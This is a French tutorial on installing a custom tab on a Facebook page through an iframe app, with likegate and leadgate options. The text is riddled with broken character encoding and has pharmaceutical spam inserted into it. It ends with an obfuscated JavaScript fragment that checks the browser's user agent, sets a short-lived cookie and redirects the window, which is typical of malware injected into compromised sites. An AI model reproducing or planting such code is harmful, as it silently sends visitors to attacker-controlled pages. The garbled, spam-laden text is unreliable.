Pour ajouter un onglet personnalisAi?? Ai?? votre page facebook, rien de plus simple.

• AccAi??dez Ai?? l’application Iframe APPS.

ladyera

https://apps.facebook.com/iframe-apps/

• ProcAi??dez Ai?? votre inscription.

Un clic suffit grA?ce au fbconnect.

generic orlistat 120mg.

• Autorisez l’application Ai?? ajouter un onglet.

Par sAi??curitAi??, l’application vous demande les accA?s manage pages nAi??cessaires pour effectuer l’ajout de l’onglet sur votre page Facebook.

Cochez simplement les pages Facebook sur lesquelles vous dAi??sirez ajouter un onglet, pour un rAi??sultat immAi??diat l’application vous installe par dAi??faut (en attendant votre configuration) une leadgate qui vous permet de commencer Ai?? gAi??nAi??rer de nouveaux inscrits en rAi??cupAi??rant leur adresse email.

• Votre onglet est installAi??, personnalisez le.

Maintenant que votre onglet est installAi?? sur votre page Facebook, vous pouvez le personnaliser.
Voyons tout d’abord l’anatomie de votre onglet.

Likegate / Leadgate.

La Likegate ou Leadgate une page que vous pouvez rajouter avant l’affichage Ai?? proprement parlAi?? de votre minisite. Cette page va servir Ai?? dAi??clencher une action de la part de votre visiteur pour accAi??der au contenu de l’onglet.
La LikeGate incitera le visiteur Ai?? aimer la page.
La LeadGate incitera l’utilisateur Ai?? s’inscrire sur la page.

L’onglet Ai?? proprement parlAi??.

Vous pouvez utiliser 3 mAi??thodes pour votre onglet :

• Une image simple.
      • Un HTML.
      • Un Embed URL.

(0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}